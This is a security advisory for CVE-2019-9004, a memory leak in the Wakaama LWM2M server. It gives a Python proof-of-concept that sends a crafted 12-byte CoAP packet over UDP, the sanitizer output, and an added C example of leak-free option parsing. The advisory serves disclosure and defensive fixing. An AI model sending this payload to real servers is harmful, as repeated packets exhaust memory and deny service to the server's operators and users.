eclipse-wakaama/wakaama

Memory leak while processing crafted packet


The Wakaama LWM2M server incorrectly handles incoming packets, leading to a memory leak.
Processing a single crafted packet leaks (wastes) 24 bytes of memory.
This can lead to the LWM2M server stopping after exhausting all available memory.
Depending on server configuration and isolation of services, this can also stop other processes on the same server.

Proposed CVSS 3.0 Score:

On systems with modern memory protection and isolation of services:
5.3 (medium) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

On systems with lower memory protection and no isolation of services:
7.5 (high) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Reproduction:

  1. Wakaama must be compiled with Leak Sanitizer (or another similar tool) by setting the compilation flag:
    C_FLAGS = -fsanitize=address

  2. Run the Wakaama server as:
    lwm2mserver -4 -l 55555

  3. Run the following Python2 script (running it multiple times will show a larger leak):


    import sys
    import socket

    WAKAAMA_PAYLOAD = "4402e6e2e2e68167b2726411"
    out_data = WAKAAMA_PAYLOAD.decode('hex')
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM )
    s.sendto(out_data, (sys.argv[1], int(sys.argv[2])))


    Execution of the script:

    python2 wakaama_test.py dst_ip dst_port
    (where: dst_ip and dst_port are IP and port of tested Wakaama server)
    e.g.:
    sudo python wakaama_test.py 192.168.0.101 55555

  4. Close the lwm2mserver to get the report from Leak Sanitizer:

    12 bytes received from [....]:....
    44 02 E6 E2 E2 E6 81 67 B2 72 64 11 D......g.rd.
    ^C
    =================================================================
    ==19153==ERROR: LeakSanitizer: detected memory leaks

    Direct leak of 24 byte(s) in 1 object(s) allocated from:
    #0 0x7f4fa293b602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x42f1df in lwm2m_malloc (/wakaama-master/build_asan/lwm2mserver+0x42f1df)
    #2 0x425ad6 in coap_add_multi_option (/wakaama-master/build_asan/lwm2mserver+0x425ad6)
    #3 0x42910f in coap_parse_message (/wakaama-master/build_asan/lwm2mserver+0x42910f)
    #4 0x412aac in lwm2m_handle_packet (/wakaama-master/build_asan/lwm2mserver+0x412aac)
    #5 0x4088e2 in main (/wakaama-master/build_asan/lwm2mserver+0x4088e2)
    #6 0x7f4fa24f982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

    SUMMARY: AddressSanitizer: 24 byte(s) leaked in 1 allocation(s).

The following ID was assigned to this vulnerability: CVE-2019-9004
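
Read as CoAP per RFC 7252, the 12 bytes in the report are a POST with a 4-byte token, a Uri-Path option `rd`, and a final option header that declares one value byte the datagram does not contain. The block below is an added example, not Wakaama's code (`seg_t`, `parse_options`, `free_segs` and `live_allocs` are hypothetical names): an option parser that releases the options it has already allocated when a later option turns out to be malformed, which is the cleanup pattern that prevents this kind of leak.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical node for one parsed option value (e.g. one Uri-Path segment). */
typedef struct seg { struct seg *next; uint16_t number; uint8_t len; uint8_t data[]; } seg_t;

/* The 12 bytes shown in the report's hex dump. */
static const uint8_t REPORT_PKT[12] = {0x44, 0x02, 0xE6, 0xE2, 0xE2, 0xE6,
                                       0x81, 0x67, 0xB2, 0x72, 0x64, 0x11};

static int live_allocs; /* constructed counter: nodes allocated and not yet freed */

static void free_segs(seg_t *s) {
    while (s) { seg_t *next = s->next; free(s); live_allocs--; s = next; }
}

/* Returns 0 with the option list in *out, or -1 on a malformed packet after
 * releasing every node allocated before the error was found. */
static int parse_options(const uint8_t *pkt, size_t len, seg_t **out) {
    seg_t *head = NULL, **tail = &head;
    unsigned number = 0;
    *out = NULL;
    if (len < 4) return -1;
    size_t tkl = pkt[0] & 0x0F, pos = 4 + tkl;   /* 4-byte header, then token */
    if (tkl > 8 || pos > len) return -1;
    while (pos < len && pkt[pos] != 0xFF) {      /* 0xFF marks the payload */
        unsigned delta = pkt[pos] >> 4, olen = pkt[pos] & 0x0F;
        pos++;
        /* Simplification: extended (13, 14) and reserved (15) nibbles are rejected. */
        if (delta > 12 || olen > 12 || olen > len - pos) goto fail;
        seg_t *s = malloc(sizeof *s + olen);
        if (!s) goto fail;
        live_allocs++;
        number += delta;
        s->next = NULL; s->number = (uint16_t)number; s->len = (uint8_t)olen;
        memcpy(s->data, pkt + pos, olen);
        *tail = s; tail = &s->next;
        pos += olen;
    }
    *out = head;
    return 0;
fail:
    free_segs(head); /* without this, options parsed before the error stay allocated */
    return -1;
}

int main(void) {
    seg_t *opts;
    return (parse_options(REPORT_PKT, sizeof REPORT_PKT, &opts) == -1 && live_allocs == 0) ? 0 : 1;
}
```

Built with `-fsanitize=address`, as in step 1, this program exits without a LeakSanitizer report; removing the `free_segs(head)` call on the `fail` path makes the leak reappear.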